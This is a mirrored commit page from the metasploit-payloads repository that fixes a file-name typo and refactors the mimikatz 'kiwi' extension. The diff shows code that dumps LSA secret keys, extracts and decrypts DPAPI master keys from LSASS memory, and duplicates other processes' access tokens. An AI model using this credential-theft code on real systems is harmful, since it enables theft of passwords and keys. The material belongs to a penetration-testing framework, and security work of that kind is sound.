mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-01-20 20:37:27 +01:00
Merge from source r104, fix silly typo in file name
This commit is contained in:
OJ
parent
c3e57bb6c1
commit
2b2508b8c9
@ -13,7 +13,7 @@
|
||||
#include "modules/kuhl_m_service.h"
|
||||
#include "modules/kuhl_m_privilege.h"
|
||||
#include "modules/kuhl_m_process.h"
|
||||
#include "modules/khul_m_lsadump.h"
|
||||
#include "modules/kuhl_m_lsadump.h"
|
||||
#include "modules/kuhl_m_ts.h"
|
||||
#include "modules/kuhl_m_event.h"
|
||||
#include "modules/kuhl_m_misc.h"
|
||||
|
||||
@ -3,7 +3,7 @@
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : http://creativecommons.org/licenses/by/3.0/fr/
|
||||
*/
|
||||
#include "khul_m_lsadump.h"
|
||||
#include "kuhl_m_lsadump.h"
|
||||
|
||||
const KUHL_M_C kuhl_m_c_lsadump[] = {
|
||||
{kuhl_m_lsadump_sam, L"sam", L"Get the SysKey to decrypt SAM entries (from registry or hives)"},
|
||||
@ -409,13 +409,11 @@ BOOL kuhl_m_lsadump_getLsaKeyAndSecrets(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN
|
||||
if(nt6keysStream = (PNT6_SYSTEM_KEYS) LocalAlloc(LPTR, ((PNT6_HARD_SECRET) buffer)->clearSecret.SecretSize))
|
||||
{
|
||||
RtlCopyMemory(nt6keysStream, ((PNT6_HARD_SECRET) buffer)->clearSecret.Secret, ((PNT6_HARD_SECRET) buffer)->clearSecret.SecretSize);
|
||||
kprintf(L"LSA Key(s) : %u, default {%08x-%04hx-%04hx-%02x%02x-%02x%02x%02x%02x%02x%02x}\n", nt6keysStream->nbKeys, nt6keysStream->CurrentKeyID.Data1, nt6keysStream->CurrentKeyID.Data2, nt6keysStream->CurrentKeyID.Data3, nt6keysStream->CurrentKeyID.Data4[0], nt6keysStream->CurrentKeyID.Data4[1], nt6keysStream->CurrentKeyID.Data4[2], nt6keysStream->CurrentKeyID.Data4[3], nt6keysStream->CurrentKeyID.Data4[4], nt6keysStream->CurrentKeyID.Data4[5], nt6keysStream->CurrentKeyID.Data4[6], nt6keysStream->CurrentKeyID.Data4[7]);
|
||||
kprintf(L"LSA Key(s) : %u, default ", nt6keysStream->nbKeys); kull_m_string_displayGUID(&nt6keysStream->CurrentKeyID); kprintf(L"\n");
|
||||
for(i = 0, offset = 0; i < nt6keysStream->nbKeys; i++, offset += FIELD_OFFSET(NT6_SYSTEM_KEY, Key) + nt6key->KeySize)
|
||||
{
|
||||
nt6key = (PNT6_SYSTEM_KEY) ((PBYTE) nt6keysStream->Keys + offset);
|
||||
kprintf(L" [%02u] {%08x-%04hx-%04hx-%02x%02x-%02x%02x%02x%02x%02x%02x} ", i, nt6key->KeyId.Data1, nt6key->KeyId.Data2, nt6key->KeyId.Data3, nt6key->KeyId.Data4[0], nt6key->KeyId.Data4[1], nt6key->KeyId.Data4[2], nt6key->KeyId.Data4[3], nt6key->KeyId.Data4[4], nt6key->KeyId.Data4[5], nt6key->KeyId.Data4[6], nt6key->KeyId.Data4[7]);
|
||||
kull_m_string_wprintf_hex(nt6key->Key, nt6key->KeySize, 0);
|
||||
kprintf(L"\n");
|
||||
kprintf(L" [%02u] ", i); kull_m_string_displayGUID(&nt6key->KeyId); kprintf(L" "); kull_m_string_wprintf_hex(nt6key->Key, nt6key->KeySize, 0); kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -45,9 +45,9 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hLocalMemory}, aKey = {NULL, &hLocalMemory}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
PKUHL_M_SEKURLSA_PACKAGE pPackage = (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
|
||||
SYSTEMTIME sTime;
|
||||
DWORD monNb = 0;
|
||||
if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
|
||||
|
||||
if(pData->LogonType != Network)
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
if(pPackage->Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &pPackage->Module, MasterKeyCacheReferences, sizeof(MasterKeyCacheReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &pMasterKeyCacheList, NULL, NULL))
|
||||
@ -62,21 +62,17 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_
|
||||
{
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
{
|
||||
kprintf(L"\t [%08x] ", monNb++);
|
||||
kprintf(L"\n\t * GUID :\t{%08x-%04hx-%04hx-%02x%02x-%02x%02x%02x%02x%02x%02x}", mesCredentials.KeyUid.Data1, mesCredentials.KeyUid.Data2, mesCredentials.KeyUid.Data3, mesCredentials.KeyUid.Data4[0], mesCredentials.KeyUid.Data4[1], mesCredentials.KeyUid.Data4[2], mesCredentials.KeyUid.Data4[3], mesCredentials.KeyUid.Data4[4], mesCredentials.KeyUid.Data4[5], mesCredentials.KeyUid.Data4[6], mesCredentials.KeyUid.Data4[7]);
|
||||
if(FileTimeToSystemTime(&mesCredentials.insertTime, &sTime))
|
||||
{
|
||||
kprintf(L"\n\t * Time :\t%02hu/%02hu/%04hu %02hu:%02hu:%02hu,%hu", sTime.wDay, sTime.wMonth, sTime.wYear, sTime.wHour, sTime.wMinute, sTime.wSecond, sTime.wMilliseconds);
|
||||
}
|
||||
kprintf(L"\t [%08x]\n\t * GUID :\t", monNb++);
|
||||
kull_m_string_displayGUID(&mesCredentials.KeyUid);
|
||||
kprintf(L"\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime);
|
||||
|
||||
if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))
|
||||
{
|
||||
aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);
|
||||
|
||||
if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))
|
||||
{
|
||||
(*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);
|
||||
kprintf(L"\n\t * Key :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 1);
|
||||
kprintf(L"\n\t * Key :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);
|
||||
}
|
||||
LocalFree(aKey.address);
|
||||
}
|
||||
@ -91,4 +87,4 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_
|
||||
kprintf(L"\n");
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
}
|
||||
|
||||
@ -131,7 +131,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
ULONG_PTR ptr;
|
||||
ULONG monNb = 0;
|
||||
PBYTE buffer;
|
||||
SYSTEMTIME sTime;
|
||||
|
||||
if(ReadMemory(pMasterKeyCacheList, &mesCredentials, sizeof(LIST_ENTRY), NULL))
|
||||
{
|
||||
ptr = (ULONG_PTR) mesCredentials.Flink;
|
||||
@ -141,18 +141,16 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
{
|
||||
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
|
||||
{
|
||||
dprintf("\n\t [%08x] ", monNb++);
|
||||
dprintf("\n\t * GUID :\t{%08x-%04hx-%04hx-%02x%02x-%02x%02x%02x%02x%02x%02x}", mesCredentials.KeyUid.Data1, mesCredentials.KeyUid.Data2, mesCredentials.KeyUid.Data3, mesCredentials.KeyUid.Data4[0], mesCredentials.KeyUid.Data4[1], mesCredentials.KeyUid.Data4[2], mesCredentials.KeyUid.Data4[3], mesCredentials.KeyUid.Data4[4], mesCredentials.KeyUid.Data4[5], mesCredentials.KeyUid.Data4[6], mesCredentials.KeyUid.Data4[7]);
|
||||
if(FileTimeToSystemTime(&mesCredentials.insertTime, &sTime))
|
||||
{
|
||||
dprintf("\n\t * Time :\t%02hu/%02hu/%04hu %02hu:%02hu:%02hu,%hu", sTime.wDay, sTime.wMonth, sTime.wYear, sTime.wHour, sTime.wMinute, sTime.wSecond, sTime.wMilliseconds);
|
||||
}
|
||||
dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++);
|
||||
kull_m_string_displayGUID(&mesCredentials.KeyUid);
|
||||
dprintf("\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime);
|
||||
|
||||
if(buffer = (PBYTE) LocalAlloc(LPTR, mesCredentials.keySize))
|
||||
{
|
||||
if(ReadMemory(ptr + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), buffer, mesCredentials.keySize, NULL))
|
||||
{
|
||||
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer, mesCredentials.keySize);
|
||||
dprintf("\n\t * Key :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 1);
|
||||
dprintf("\n\t * Key :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 0);
|
||||
}
|
||||
LocalFree(buffer);
|
||||
}
|
||||
@ -163,4 +161,4 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
}
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
}
|
||||
|
||||
@ -20,6 +20,42 @@ void kull_m_string_dprintf_hex(LPCVOID lpData, DWORD cbData, DWORD flags)
|
||||
dprintf(pType, ((LPCBYTE) lpData)[i]);
|
||||
}
|
||||
|
||||
void kull_m_string_displayFileTime(IN PFILETIME pFileTime)
|
||||
{
|
||||
SYSTEMTIME st;
|
||||
char buffer[0xff];
|
||||
if(pFileTime)
|
||||
{
|
||||
if(FileTimeToSystemTime(pFileTime, &st ))
|
||||
{
|
||||
if(GetDateFormatA(LOCALE_USER_DEFAULT, 0, &st, NULL, buffer, sizeof(buffer)))
|
||||
{
|
||||
dprintf("%s ", buffer);
|
||||
if(GetTimeFormatA(LOCALE_USER_DEFAULT, 0, &st, NULL, buffer, sizeof(buffer)))
|
||||
dprintf("%s", buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime)
|
||||
{
|
||||
FILETIME ft;
|
||||
if(pFileTime)
|
||||
if(FileTimeToLocalFileTime(pFileTime, &ft))
|
||||
kull_m_string_displayFileTime(&ft);
|
||||
}
|
||||
|
||||
void kull_m_string_displayGUID(IN LPCGUID pGuid)
|
||||
{
|
||||
UNICODE_STRING uString;
|
||||
if(NT_SUCCESS(RtlStringFromGUID(pGuid, &uString)))
|
||||
{
|
||||
dprintf("%wZ", &uString);
|
||||
RtlFreeUnicodeString(&uString);
|
||||
}
|
||||
}
|
||||
|
||||
BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString)
|
||||
{
|
||||
int unicodeTestFlags = IS_TEXT_UNICODE_ODD_LENGTH | IS_TEXT_UNICODE_STATISTICS;
|
||||
@ -134,4 +170,4 @@ BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid)
|
||||
status = ReadMemory(buffer, *pSid, sizeSid, NULL);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
}
|
||||
|
||||
@ -154,6 +154,9 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
|
||||
#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
|
||||
extern BOOLEAN WINAPI RtlEqualString(IN const STRING *String1, IN const STRING *String2, IN BOOLEAN CaseInSensitive);
|
||||
extern VOID WINAPI RtlFreeUnicodeString(IN PUNICODE_STRING UnicodeString);
|
||||
extern NTSTATUS WINAPI RtlStringFromGUID(IN LPCGUID Guid, PUNICODE_STRING UnicodeString);
|
||||
|
||||
#define LM_NTLM_HASH_LENGTH 16
|
||||
#define SHA_DIGEST_LENGTH 20
|
||||
|
||||
@ -164,5 +167,8 @@ void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PL
|
||||
|
||||
BOOL kull_m_string_getDbgUnicodeString(IN PUNICODE_STRING string);
|
||||
void kull_m_string_dprintf_hex(LPCVOID lpData, DWORD cbData, DWORD flags);
|
||||
void kull_m_string_displayFileTime(IN PFILETIME pFileTime);
|
||||
void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime);
|
||||
void kull_m_string_displayGUID(IN LPCGUID pGuid);
|
||||
BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString);
|
||||
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
|
||||
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
|
||||
|
||||
@ -13,7 +13,7 @@ VOID kull_m_handle_initialise()
|
||||
NtQueryObject = (NTSTATUS(WINAPI *)(IN OPTIONAL HANDLE Handle, IN OBJECT_INFORMATION_CLASS ObjectInformationClass, OUT OPTIONAL PVOID ObjectInformation, IN ULONG ObjectInformationLength, OUT OPTIONAL PULONG ReturnLength))GetProcAddress(ntDll, "NtQueryObject");
|
||||
}
|
||||
|
||||
NTSTATUS kull_m_handle_getHandles(PKULL_M_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg)
|
||||
NTSTATUS kull_m_handle_getHandles(PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg)
|
||||
{
|
||||
NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH;
|
||||
ULONG i;
|
||||
@ -32,4 +32,65 @@ NTSTATUS kull_m_handle_getHandles(PKULL_M_HANDLE_ENUM_CALLBACK callBack, PVOID p
|
||||
LocalFree(buffer);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
NTSTATUS kull_m_handle_getHandlesOfType(PKULL_M_HANDLE_ENUM_CALLBACK callBack, LPCTSTR type, DWORD dwDesiredAccess, DWORD dwOptions, PVOID pvArg)
|
||||
{
|
||||
UNICODE_STRING uStr;
|
||||
HANDLE_ENUM_DATA data = {NULL, dwDesiredAccess, dwOptions, callBack, pvArg};
|
||||
if(type)
|
||||
{
|
||||
RtlInitUnicodeString(&uStr, type);
|
||||
data.type = &uStr;
|
||||
}
|
||||
return kull_m_handle_getHandles(kull_m_handle_getHandlesOfType_callback, &data);
|
||||
}
|
||||
|
||||
BOOL CALLBACK kull_m_handle_getHandlesOfType_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg)
|
||||
{
|
||||
PHANDLE_ENUM_DATA pData = (PHANDLE_ENUM_DATA) pvArg;
|
||||
BOOL status = TRUE;
|
||||
HANDLE hProcess, hRemoteHandle;
|
||||
POBJECT_TYPE_INFORMATION pInfos;
|
||||
ULONG szNeeded;
|
||||
|
||||
if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pSystemHandle->ProcessId))
|
||||
{
|
||||
if(DuplicateHandle(hProcess, (HANDLE) pSystemHandle->Handle, GetCurrentProcess(), &hRemoteHandle, pData->dwDesiredAccess, TRUE, pData->dwOptions))
|
||||
{
|
||||
if(NtQueryObject(hRemoteHandle, ObjectTypeInformation, NULL, 0, &szNeeded) == STATUS_INFO_LENGTH_MISMATCH)
|
||||
{
|
||||
if(pInfos = (POBJECT_TYPE_INFORMATION) LocalAlloc(LPTR, szNeeded))
|
||||
{
|
||||
if(NT_SUCCESS(NtQueryObject(hRemoteHandle, ObjectTypeInformation, pInfos, szNeeded, &szNeeded)))
|
||||
{
|
||||
if(!pData->type || RtlEqualUnicodeString(&pInfos->TypeName, pData->type, TRUE))
|
||||
status = pData->callBack(hRemoteHandle, pSystemHandle, pData->pvArg);
|
||||
}
|
||||
LocalFree(pInfos);
|
||||
}
|
||||
}
|
||||
CloseHandle(hRemoteHandle);
|
||||
}
|
||||
CloseHandle(hProcess);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kull_m_handle_GetUserObjectInformation(HANDLE hObj, int nIndex, PVOID *pvInfo, PDWORD nLength)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD szNeeded;
|
||||
|
||||
if(!GetUserObjectInformation(hObj, nIndex, NULL, 0, &szNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER) && szNeeded)
|
||||
{
|
||||
if(*pvInfo = LocalAlloc(LPTR, szNeeded))
|
||||
{
|
||||
if(nLength)
|
||||
*nLength = szNeeded;
|
||||
if(!(status = GetUserObjectInformation(hObj, nIndex, *pvInfo, szNeeded, &szNeeded)))
|
||||
LocalFree(*pvInfo);
|
||||
}
|
||||
}
|
||||
return status;
|
||||
}
|
||||
@ -58,7 +58,21 @@ typedef struct _SYSTEM_HANDLE_INFORMATION
|
||||
SYSTEM_HANDLE Handles[ANYSIZE_ARRAY];
|
||||
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
|
||||
|
||||
typedef BOOL (CALLBACK * PKULL_M_HANDLE_ENUM_CALLBACK) (PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
typedef BOOL (CALLBACK * PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK) (PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
typedef BOOL (CALLBACK * PKULL_M_HANDLE_ENUM_CALLBACK) (HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
|
||||
typedef struct _HANDLE_ENUM_DATA
|
||||
{
|
||||
PCUNICODE_STRING type;
|
||||
DWORD dwDesiredAccess;
|
||||
DWORD dwOptions;
|
||||
PKULL_M_HANDLE_ENUM_CALLBACK callBack;
|
||||
PVOID pvArg;
|
||||
} HANDLE_ENUM_DATA, *PHANDLE_ENUM_DATA;
|
||||
|
||||
NTSTATUS kull_m_handle_getHandles(PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
NTSTATUS kull_m_handle_getHandlesOfType(PKULL_M_HANDLE_ENUM_CALLBACK callBack, LPCTSTR type, DWORD dwDesiredAccess, DWORD dwOptions, PVOID pvArg);
|
||||
|
||||
BOOL CALLBACK kull_m_handle_getHandlesOfType_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
|
||||
NTSTATUS kull_m_handle_getHandles(PKULL_M_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
VOID kull_m_handle_initialise();
|
||||
@ -56,7 +56,7 @@ BOOL kull_m_token_getTokens(PKULL_M_TOKEN_ENUM_CALLBACK callBack, PVOID pvArg)
|
||||
KULL_M_TOKEN_ENUM_DATA data = {callBack, pvArg, TRUE};
|
||||
if(status = NT_SUCCESS(kull_m_process_getProcessInformation(kull_m_token_getTokens_process_callback, &data)))
|
||||
if(data.mustContinue)
|
||||
status = NT_SUCCESS(kull_m_handle_getHandles(kull_m_token_getTokens_handles_callback, &data));
|
||||
status = NT_SUCCESS(kull_m_handle_getHandlesOfType(kull_m_token_getTokens_handles_callback, L"Token", TOKEN_QUERY | TOKEN_DUPLICATE, 0, &data));
|
||||
return status;
|
||||
}
|
||||
|
||||
@ -74,36 +74,10 @@ BOOL CALLBACK kull_m_token_getTokens_process_callback(PSYSTEM_PROCESS_INFORMATIO
|
||||
}
|
||||
CloseHandle(hProcess);
|
||||
}
|
||||
((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = status;
|
||||
return status;
|
||||
return (((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = status);
|
||||
}
|
||||
|
||||
CONST UNICODE_STRING kull_m_token_strToken = {10, 12, L"Token"};
|
||||
BOOL CALLBACK kull_m_token_getTokens_handles_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg)
|
||||
BOOL CALLBACK kull_m_token_getTokens_handles_callback(HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg)
|
||||
{
|
||||
BOOL status = TRUE;
|
||||
HANDLE hProcess, hRemoteHandle;
|
||||
POBJECT_TYPE_INFORMATION pInfos;
|
||||
ULONG szNeeded;
|
||||
|
||||
if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pSystemHandle->ProcessId))
|
||||
{
|
||||
if(DuplicateHandle(hProcess, (HANDLE) pSystemHandle->Handle, GetCurrentProcess(), &hRemoteHandle, TOKEN_QUERY | TOKEN_DUPLICATE, TRUE, 0))
|
||||
{
|
||||
if(NtQueryObject(hRemoteHandle, ObjectTypeInformation, NULL, 0, &szNeeded) == STATUS_INFO_LENGTH_MISMATCH)
|
||||
{
|
||||
if(pInfos = (POBJECT_TYPE_INFORMATION) LocalAlloc(LPTR, szNeeded))
|
||||
{
|
||||
if(NT_SUCCESS(NtQueryObject(hRemoteHandle, ObjectTypeInformation, pInfos, szNeeded, &szNeeded)))
|
||||
if(RtlEqualUnicodeString(&pInfos->TypeName, &kull_m_token_strToken, TRUE))
|
||||
status = ((PKULL_M_TOKEN_ENUM_DATA) pvArg)->callback(hRemoteHandle, pSystemHandle->ProcessId, ((PKULL_M_TOKEN_ENUM_DATA) pvArg)->pvArg);
|
||||
LocalFree(pInfos);
|
||||
}
|
||||
}
|
||||
CloseHandle(hRemoteHandle);
|
||||
}
|
||||
CloseHandle(hProcess);
|
||||
}
|
||||
((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = status;
|
||||
return status;
|
||||
return (((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = ((PKULL_M_TOKEN_ENUM_DATA) pvArg)->callback(handle, pSystemHandle->ProcessId, ((PKULL_M_TOKEN_ENUM_DATA) pvArg)->pvArg));
|
||||
}
|
||||
|
||||
@ -18,7 +18,7 @@ typedef struct _KULL_M_TOKEN_ENUM_DATA {
|
||||
|
||||
BOOL kull_m_token_getTokens(PKULL_M_TOKEN_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_token_getTokens_process_callback(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_token_getTokens_handles_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_token_getTokens_handles_callback(HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
|
||||
BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * pDomain, PWSTR * pSid, PSID_NAME_USE pSidNameUse);
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse);
|
||||
@ -575,7 +575,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_pac.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_ticket.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\khul_m_lsadump.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_crypto.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_event.h" />
|
||||
@ -630,7 +630,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_pac.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_ticket.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\khul_m_lsadump.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_crypto.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_event.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_kernel.c" />
|
||||
|
||||
@ -125,9 +125,6 @@
|
||||
<Filter>modules</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\debug.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\khul_m_lsadump.h">
|
||||
<Filter>modules</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_ticket.h">
|
||||
<Filter>modules\kerberos</Filter>
|
||||
</ClInclude>
|
||||
@ -146,6 +143,9 @@
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\modules\kull_m_rpce.h">
|
||||
<Filter>common</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.h">
|
||||
<Filter>modules</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ResourceCompile Include="..\..\source\extensions\kiwi\mimikatz\mimikatz.rc" />
|
||||
@ -261,9 +261,6 @@
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_process.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\khul_m_lsadump.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos.c">
|
||||
<Filter>modules\kerberos</Filter>
|
||||
</ClCompile>
|
||||
@ -283,6 +280,9 @@
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_vault.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="modules">
|
||||
|
||||
Loading…
Reference in New Issue
Block a user